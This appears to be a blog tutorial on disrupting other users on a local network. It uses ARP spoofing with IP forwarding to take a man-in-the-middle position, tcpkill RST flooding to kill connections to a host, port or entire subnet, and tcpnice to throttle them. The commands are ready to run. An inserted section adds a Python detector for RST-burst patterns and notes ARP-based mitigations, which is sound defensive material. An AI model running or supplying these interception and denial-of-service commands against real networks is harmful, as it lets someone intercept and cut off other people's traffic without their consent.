First we need to perform a MITM (man-in-the-middle) attack (arpspoof or ettercap will do) and enable IP forwarding in the kernel as follows:
# echo 1 > /proc/sys/net/ipv4/ip_forward
We then need to determine which local IP is hogging the bandwidth. There is a useful sniffer I use called tcptrack that lists the live connections it sees and the bandwidth/speed of the data being transferred back and forth on each connection.
# tcptrack -i eth0
Once you determine the IP of the bandwidth hogger (in this example, 10.0.0.2), it's time to unleash our magic.
# tcpkill -i eth0 -9 host 10.0.0.2
The '-9' specifies the degree of brute force to use in killing a connection. Fast connections may require a higher number in order to land a RST in the moving receive window (that's the method used to kill connections: flood the receive window with RST packets to tear down the connection). The default is 3.
This in turn kills/blocks all of the traffic going to or from 10.0.0.2. If you want to be more specific and block only the port that is using the most bandwidth, you can do this instead.
# tcpkill -i eth0 -9 host 10.0.0.2 and port 4455
Or if you're really mad at the world, you can wipe off the whole subnet.
# tcpkill -9 net 192.168.1
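The RST flooding described above leaves a signature on the wire: a legitimate abort is a single RST, whereas tcpkill fires several RSTs per direction with sequence numbers stepped across the receive window. The following detector is an added example (not code from the post or from dsniff) that runs over a constructed packet list, which you would in practice feed from a SPAN port or pcap; the addresses, ports and 8192-byte window step are assumed sample values.

```python
from collections import defaultdict, deque

# Constructed sample capture (not from the post): one record per packet as
# (timestamp_s, src, dst, sport, dport, tcp_flags, seq). The remote side uses
# the documentation range 203.0.113.0/24.
SAMPLE_PACKETS = [
    (0.000, "10.0.0.2", "203.0.113.10", 52311, 443, "PA", 1000),
    (0.010, "203.0.113.10", "10.0.0.2", 443, 52311, "A", 5000),
    (0.020, "10.0.0.5", "10.0.0.9", 40000, 22, "R", 777),  # lone RST: a normal abort
    # tcpkill-style teardown: stepped-sequence RSTs, aimed at both endpoints
    (0.100, "10.0.0.2", "203.0.113.10", 52311, 443, "R", 1000),
    (0.101, "10.0.0.2", "203.0.113.10", 52311, 443, "R", 1000 + 8192),
    (0.102, "10.0.0.2", "203.0.113.10", 52311, 443, "R", 1000 + 2 * 8192),
    (0.103, "10.0.0.2", "203.0.113.10", 52311, 443, "R", 1000 + 3 * 8192),
    (0.104, "10.0.0.2", "203.0.113.10", 52311, 443, "R", 1000 + 4 * 8192),
    (0.105, "203.0.113.10", "10.0.0.2", 443, 52311, "R", 5000),
    (0.106, "203.0.113.10", "10.0.0.2", 443, 52311, "R", 5000 + 8192),
    (0.107, "203.0.113.10", "10.0.0.2", 443, 52311, "R", 5000 + 2 * 8192),
    (0.108, "203.0.113.10", "10.0.0.2", 443, 52311, "R", 5000 + 3 * 8192),
]


def detect_rst_bursts(packets, window=1.0, threshold=3):
    """Flag flows carrying `threshold` or more RSTs within `window` seconds.

    Returns {flow_4tuple: {"count": peak RSTs in window, "distinct_seq": n}}.
    A high distinct_seq alongside the count is the stepped-window pattern.
    """
    recent = defaultdict(deque)  # flow -> deque of (ts, seq) still inside the window
    alerts = {}
    for ts, src, dst, sport, dport, flags, seq in sorted(packets):
        if "R" not in flags:
            continue
        flow = (src, dst, sport, dport)
        q = recent[flow]
        q.append((ts, seq))
        while q and ts - q[0][0] > window:  # expire RSTs older than the window
            q.popleft()
        if len(q) >= threshold and len(q) > alerts.get(flow, {"count": 0})["count"]:
            alerts[flow] = {"count": len(q), "distinct_seq": len({s for _, s in q})}
    return alerts


if __name__ == "__main__":
    for flow, info in detect_rst_bursts(SAMPLE_PACKETS).items():
        print(f"RST burst on {flow}: {info['count']} RSTs, {info['distinct_seq']} distinct seq")
```

The lone RST on the SSH flow is left alone; only the two directions of the torn-down HTTPS connection are reported. A kernel-level mitigation on the LAN side is static ARP entries or dynamic ARP inspection, which removes the MITM position tcpkill relies on.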
Similarly, tcpnice can be used to slow connections down, rather than to simply kill them.
# tcpnice -i eth0 -A host 10.0.0.2
[Options]
-A Inject TCP tiny window advertisements.
-I Inject ICMP source quench replies.
-M Inject ICMP fragmentation-needed replies with tiny next-hop MTUs.
-i Interface to listen on.
If no option (A, I, M) is given, all would be used.